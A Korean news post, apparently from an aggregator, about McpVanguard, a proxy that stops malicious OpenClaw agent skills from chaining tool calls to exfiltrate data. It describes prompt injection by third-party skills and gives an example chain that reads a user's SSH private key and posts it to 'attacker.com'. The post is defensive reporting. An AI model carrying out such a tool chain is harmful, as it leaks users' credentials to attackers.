McpVanguard 프록시, OpenClaw 스킬 데이터 유출 차단

✍️ OpenClawRadar📅 게시일: March 20, 2026🔗 Source
McpVanguard 프록시, OpenClaw 스킬 데이터 유출 차단
Ad

Cisco의 AI 보안 팀이 제3자 OpenClaw 스킬이 무단 데이터 유출과 프롬프트 주입을 수행하는 것을 발견한 데 대한 대응으로, 한 개발자가 McpVanguard를 출시했습니다. 이는 AI 에이전트와 그 도구 사이에 위치하여 악성 호출이 실행되기 전에 차단하도록 설계된 프록시입니다.

문제: 연쇄적인 악성 호출

보안 문제는 OpenClaw 자체의 버그가 아니라, 에이전트가 파일 시스템 접근, 셸 실행, 네트워크 호출을 강제 경계 없이 가질 수 있는 결과입니다. Cisco의 테스트는 겉보기에 무해한 개별 호출이 결합하여 침해를 일으키는 패턴을 드러냈습니다. 예를 들어:

read_file("~/.ssh/id_rsa") → http_post("attacker.com", contents)

어떤 호출도 단독으로는 악성으로 보이지 않지만, 함께 작동하면 민감한 데이터를 유출합니다. 소스에 따르면, ClawHub는 정점에서 820개 이상의 악성 스킬을 보유했으며, CVE-2026-25253은 공격자가 단일 악성 링크를 통해 원격 코드 실행을 달성할 수 있게 했습니다. 현재의 스킬 수준 검증은 이러한 연쇄 호출 시퀀스를 감지하지 못합니다.

해결책: McpVanguard 프록시

McpVanguard는 에이전트와 그 도구 사이의 호출을 가로채어 이 문제를 해결합니다. 세 가지 탐지 방법을 사용합니다:

  • 패턴 매칭
  • 의미적 의도 점수화
  • 전체 세션에 걸친 행동 연쇄 탐지

설치는 pip를 통해 가능합니다: pip install mcp-vanguard.

Ad

심층 계층: VEX 프로토콜

이 프로젝트는 "비행 기록 장치" 시스템으로 설명되는 VEX 프로토콜이라는 더 깊은 보안 계층을 포함합니다. 이는 다음을 제공합니다:

  • 변조 감지 로깅을 위한 Merkle 감사 추적
  • TPM 기반 에이전트 신원 확인
  • 시스템 호출 수준의 강제 실행

VEX 프로토콜은 Rust로 구축되었으며, 개발은 OpenClaw가 널리 인기를 얻기 전인 2023년 12월에 시작되었습니다. 소스는 NVIDIA가 최근 유사한 보안 목적으로 NemoClaw를 출시했으며, 이는 이러한 유형의 위협이 사라지지 않을 것임을 나타낸다고 언급합니다.

두 프로젝트 모두 GitHub에서 이용 가능합니다:

📖 Read the full source: r/openclaw

Ad

👀 See Also